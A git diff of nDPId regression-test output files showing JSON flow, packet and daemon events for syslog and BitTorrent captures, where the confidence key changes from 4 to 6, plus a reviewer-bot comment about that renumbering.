{"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
-00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1618744117704,"flow_last_seen":1618744314014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1618744117704,"flow_last_seen":1618744314014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":85,"packets-processed":82,"total-skipped-flows":0,"total-l4-payload-len":11419,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":0,"total-updates":2,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":107,"global_ts_msec":1646228387732} 00184{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","layer_type":34916,"global_ts_msec":1646228387732} 00971{"packet_event_id":1,"packet_event_name":"packet","packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":525,"pkt_type":34916,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":525,"pkt_l4_len":0,"thread_ts_msec":1639052948178,"pkt":"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"} 
@@ -116,15 +116,15 @@ 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":89,"packets-processed":82,"total-skipped-flows":0,"total-l4-payload-len":11419,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":0,"total-updates":2,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":116,"global_ts_msec":1646781267422} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781267422,"flow_last_seen":1646781267422,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1646781267422,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1646781267422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":137,"pkt_l4_len":99,"thread_ts_msec":1646781267422,"pkt":"AAkPCQAVREyokzbXgQAH1QgARQAAd4NyQAA+ESYdCl7oFQpelhXgHgICAGMIejw2Pk1hciAgOSAwNDo0NDoyNyBOREMzQ0xORE1WQTIyIGtlcm5lbDogSVB2NjogQUREUkNPTkYoTkVUREVWX1VQKTogZXRoMDogbGluayBpcyBub3QgcmVhZHk="} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781267422,"flow_last_seen":1646781267422,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1646781267422,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781267422,"flow_last_seen":1646781267422,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1646781267422,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1646781267424,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":142,"pkt_l4_len":104,"thread_ts_msec":1646781267424,"pkt":"AAkPCQAVREyokzbXgQAH1QgARQAAfIN0QAA+ESYWCl7oFQpelhXgHgICAGj66Tw2Pk1hciAgOSAwNDo0NDoyNyBOREMzQ0xORE1WQTIyIGtlcm5lbDogSVB2NjogQUREUkNPTkYoTkVUREVWX0NIQU5HRSk6IGV0aDA6IGxpbmsgYmVjb21lcyByZWFkeQ=="} 
00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1646781267424,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":149,"pkt_l4_len":111,"thread_ts_msec":1646781267424,"pkt":"AAkPCQAVREyokzbXgQAH1QgARQAAg4N1QAA+ESYOCl7oFQpelhXgHgICAG\/wdjw2Pk1hciAgOSAwNDo0NDoyNyBOREMzQ0xORE1WQTIyIGtlcm5lbDogSVB2NjogQUREUkNPTkYoTkVUREVWX0NIQU5HRSk6IHZldGhhNWZhMTNmOiBsaW5rIGJlY29tZXMgcmVhZHk="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1646781268509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1316,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1316,"pkt_l4_len":1278,"thread_ts_msec":1646781268509,"pkt":"AAkPCQAVREyokzbXgQAH1QgARQAFEpBvQAA+EaxdCl5QPApelhaaDgICBP4qVzwzMD5NYXIgIDkgMDQ6NDQ6MjggbmRjM2x2bXNkcHRkMiBmaWxlYmVhdDogMjAyMi0wMy0wOVQwNDo0NDoyOC41MDIrMDUzMCMwMTFJTkZPIzAxMVttb25pdG9yaW5nXSMwMTFsb2cvbG9nLmdvOjE0NSMwMTFOb24temVybyBtZXRyaWNzIGluIHRoZSBsYXN0IDMwcyMwMTF7Im1vbml0b3JpbmciOiB7Im1ldHJpY3MiOiB7ImJlYXQiOnsiY3B1Ijp7InN5c3RlbSI6eyJ0aWNrcyI6MzQyNzY1MCwidGltZSI6eyJtcyI6M319LCJ0b3RhbCI6eyJ0aWNrcyI6NjA2MDIxMCwidGltZSI6eyJtcyI6OH0sInZhbHVlIjo2MDYwMjEwfSwidXNlciI6eyJ0aWNrcyI6MjYzMjU2MCwidGltZSI6eyJtcyI6NX19fSwiaGFuZGxlcyI6eyJsaW1pdCI6eyJoYXJkIjo0MDk2LCJzb2Z0IjoxMDI0fSwib3BlbiI6MTB9LCJpbmZvIjp7ImVwaGVtZXJhbF9pZCI6ImI0MDc3MDU1LTNlZmUtNDk4Yi04ZDUwLWQ5MTZmMWYzMTllYSIsInVwdGltZSI6eyJtcyI6ODkyNzYxMjYxM319LCJtZW1zdGF0cyI6eyJnY19uZXh0IjoyNTIwNDQ0OCwibWVtb3J5X2FsbG9jIjoxNjQzMjM5MiwibWVtb3J5X3RvdGFsIjo0NzA1MTM5NDgyNDh9LCJydW50aW1lIjp7Imdvcm91dGluZXMiOjM0fX0sImZpbGViZWF0Ijp7ImV2ZW50cyI6eyJhZGRlZCI6MiwiZG9uZSI6Mn0sImhhcnZlc3RlciI6eyJmaWxlcyI6eyJhYmY2ZWIzOC02NGFjLTRjY2UtOWQyNy1hZjlmNjg0MzAwYmIiOnsibGFzdF9ldmVudF9wdWJsaXNoZWRfdGltZSI6IjIwMjItMDMtMDlUMDQ6NDM6NTkuNTQ0WiIsImxhc3RfZXZlbnRfdGltZXN0YW1wIjoiMjAyMi0wMy0wOVQwNDo0Mzo1OS41NDRaIiwicmVhZF9vZmZzZXQiOjI1MzIsInNpemUiOjI1MzJ9fSwib3Blbl9maWxlcyI6MiwicnVubmluZyI6Mn19LCJsaWJiZWF0Ijp7ImNvbmZpZyI6eyJtb2R1bGUiOnsicnVubmluZyI6MH19LCJvdXRwdXQiOnsiZXZlbnRzIjp7ImFja2VkIjoyLCJiYXRjaGVzIjoxLCJ0b3RhbCI6Mn0sInJlYWQiOnsiYnl0ZXMiOjEyfSwid3JpdGUiOnsiYnl0ZXMiOjEyMzR9fSwicGlwZWxpbmUiOnsiY2xpZW50cyI6MSwiZXZlbnRzIjp7ImFjdGl2ZSI6MCwicHVibGlzaGVkIjoyLCJ0b3RhbCI6Mn0sInF1ZXVlIjp7ImFja2VkIjoyfX19LCJyZWdpc3RyYXIiOnsic3RhdGVzIjp7ImN1cnJlbnQiOjMsInVwZGF0ZSI6Mn0sIndyaXRlcyI6eyJzdWNj
ZXNzIjoxLCJ0b3RhbCI6MX19LCJzeXN0ZW0iOnsibG9hZCI6eyIxIjowLCIxNSI6MC4wNSwiNSI6MC4wMSwibm9ybSI6eyIxIjowLCIxNSI6MC4wMTI1LCI1IjowLjAwMjV9fX19fX0="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1646781267422,"flow_last_seen":1646781267427,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1646781267422,"flow_last_seen":1646781267427,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":94,"packets-processed":88,"total-skipped-flows":0,"total-l4-payload-len":13199,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":17,"total-detection-updates":0,"total-updates":2,"current-active-flows":0,"total-active-flows":19,"total-idle-flows":19,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":128,"global_ts_msec":1646781268509} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 94/88 @@ -134,9 +134,9 @@ ~~ total active/idle flows...: 19/19 ~~ total timeout flows.......: 2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5893319 bytes -~~ total memory freed........: 5893319 bytes -~~ total allocations/frees...: 118282/118282 +~~ total memory allocated....: 6026953 bytes +~~ total memory freed........: 6026953 bytes +~~ total allocations/frees...: 121044/121044 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 181 chars ~~ json string max len.......: 2143 chars 
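Review bot: The regenerated baseline in this hunk changes the numeric confidence key while the label stays the same: `"confidence": {"4":"DPI"}` becomes `"confidence": {"6":"DPI"}` on every `detected` and `idle` flow event, and the commit message only says the library was bumped. Presumably the upstream confidence enum gained entries ahead of DPI; a consumer that filters or alerts on the numeric key rather than the label would then silently read these flows at a different confidence level. I would record this in the commit description or changelog, e.g. `ndpi.confidence ids renumbered by the libnDPI bump; match on the label string, not the numeric key`, and check the project's JSON schema and example consumers for a hard-coded `4`. The same renumbering appears in the preceding hunk of this file, which starts outside this view.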
diff --git a/test/results/targusdataspeed_false_positives.pcap.out b/test/results/targusdataspeed_false_positives.pcap.out new file mode 100644 index 000000000..c29ec712e --- /dev/null +++ b/test/results/targusdataspeed_false_positives.pcap.out 
@@ -0,0 +1,27 @@ +00482{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":35569,"flow_last_seen":35569,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":35569,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.164.55.123","src_port":23994,"dst_port":5001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":35569,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":35569,"pkt":"UlQAEjUCCAAn5uVZCABFAAB+ehEAAIARLTAKAAIPT6Q3e126E4kAahVHZDE6YWQyOmlkMjA69gJ3AZhiwRyVvvTzAO9QVrdoSnA2OnRhcmdldDIwOvYCdwGYYsEclb708wDvUFa3aEpxZTE6cTk6ZmluZF9ub2RlMTp0ODqI0o3DoQnQUDE6eTE6cWU="} 
+00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":35569,"flow_last_seen":35569,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":35569,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.164.55.123","src_port":23994,"dst_port":5001,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} +00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":35636,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":35636,"pkt":"CAAn5uVZUlQAEjUCCABFAAEsIRMAAEARxYBPpDd7CgACDxOJXboBGPLZZDE6cmQyOmlkMjA68UwExRsq0lCIShWrmnwu+\/\/0D7o1Om5vZGVzMjA4OvYAw899hNamT5KlgR2oiHhyxzt01YhPzcLg9vgydcW8k4cv3Fr8tOeq+ypspa88fV\/qHx\/3l4TUEQlsHQ8kuklZu9SYGxxo3AW9vBe3U\/QuIpDY+J7KWxp01dUfUbcCXYWSXkiOpVN49GgveSTxM3cRnx3eRLH3ohcTJWfDmrMCp+L0oDemOnYZoghQIR1LsfeiLZ01ksOarKm8jfVq2pAMsKaNMS+nVbowDyKKXuuYPFaGCGdt9d\/0aGIls7MrEGZ+WwkinkejemJ2n2VYUxllMTp0ODqI0o3DoQnQUDE6eTE6cmU="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":46627,"flow_last_seen":46627,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":46627,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.64.45.227","src_port":23994,"dst_port":5201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":46627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":46627,"pkt":"UlQAEjUCCAAn5uVZCABFAAB+wS0AAIAR5g8KAAIPWUAt4126FFEAas9YZDE6YWQyOmlkMjA69gJ3AZhiwRyVvvTzAO9QVrdoSnA2OnRhcmdldDIwOgn9iP5nnT7jakELDP8Qr6lIl7WOZTE6cTk6ZmluZF9ub2RlMTp0ODrKoRjdnOxydTE6eTE6cWU="} +00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":46627,"flow_last_seen":46627,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":46627,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.64.45.227","src_port":23994,"dst_port":5201,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} 
+00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":47351,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":345,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":345,"pkt_l4_len":311,"thread_ts_msec":47351,"pkt":"CAAn5uVZUlQAEjUCCABFAAFLPoUAAEARp+tZQC3jCgACDxRRXboBN3DOZDI6aXA2Ol0v4fi2NTE6cmQyOmlkMjA6Cixkc\/ArsXcJ7U3wslfTpV0++Qo1Om5vZGVzMjA4OgnoTWcn5Dz1WsC7MJGi19W6kHfXwIMsWf7sCMB+iYC28R+pvpNIPRWUbo8TACBttiU\/eIoJTCvSXHm7E6mVIW1xdJVtFGBxj71Fdbbh6Qi0O4aQ71PNaDpVSFMJBfrOkxEjUPl1HgURCYdIr0PZ+eaVADua7fVMXBTcQ4EChJrSdkcJ4hLhbiau6yJI+VuOfD+bIhmzz7V5SbNlNQhV3fqFlrrzSnPbqxOCr29KlotYDsDTJxC1CNuf8fG76euzpts8hww+mSReDZCIHta8ty8xOnBpNDY2NDVlZTE6dDg6yqEY3ZzscnUxOnY0OkxUAQIxOnkxOnJl"} 